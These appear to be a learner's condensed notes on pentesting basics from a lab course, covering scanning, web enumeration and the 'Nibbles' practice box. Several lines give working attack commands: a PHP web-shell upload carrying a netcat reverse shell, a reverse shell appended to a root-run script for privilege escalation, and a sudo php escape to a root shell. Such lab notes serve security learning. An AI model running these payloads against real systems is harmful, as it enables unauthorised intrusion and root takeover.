Pentesting basics
- Common terms
- shell, port, web server
- Basic tools
- ssh, netcat, tmux, vim
- Service scanning
- nmap, nmap scripts, banner grabbing, ftp, smb+shares, snmp (community string - get network info and creds)
- Web enumeration
- gobuster (with seclists), banner grabbing, Whatweb, Certificates, Robots.txt, Source Code
- public exploits
- searchsploit, metasploit
- types of shells
- reverse shell
- bind shell
- Web Shell
- upgrade a shell with
python -c 'import pty; pty.spawn("/bin/bash")'
- privilege escalation
- enumeration scripts (Linux enumeration scripts include LinEnum and linuxprivchecker, and for Windows include Seatbelt and JAWS), or Privilege Escalation Awesome Scripts SUITE (PEASS) for both
- Kernel Exploits
- Vulnerable Software
- User Privileges
- Scheduled Tasks
- Exposed Credentials
- SSH Keys
(user2 : user2) NOPASSWD: /bin/bashas user1 meanssudo -u user2 /bin/bashworks
- transfering files
- wget, SCP, Base64
Attacking Your First Box
- nibbles, enumeration
nmap -sV --open <IP>
- nibbles, web footprinting
- whatweb,
gobuster dir -u http://10.129.42.190/ --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt
- whatweb,
- nibbles, initial footprinting
- upload
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>and usenc -lvnp 9443to catch shell andpython3 -c 'import pty; pty.spawn("/bin/bash")'to upgrade it
- upload
- nibbles, privilege escation
monitor.shhad sudo -l permission as root, can useecho 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.39 8443 >/tmp/f' | tee -a monitor.shto modify and connect as root
- nibbles, metasploit
- use msf module
multi/http/nibbleblog_file_upload
- use msf module
Knowledge check
- GetSimple CMS
- user flag is enter admin page
admin:admin, edit php theme - root flag is suid php binary, use
sudo /usr/bin/php -r 'system("/bin/bash");'
- user flag is enter admin page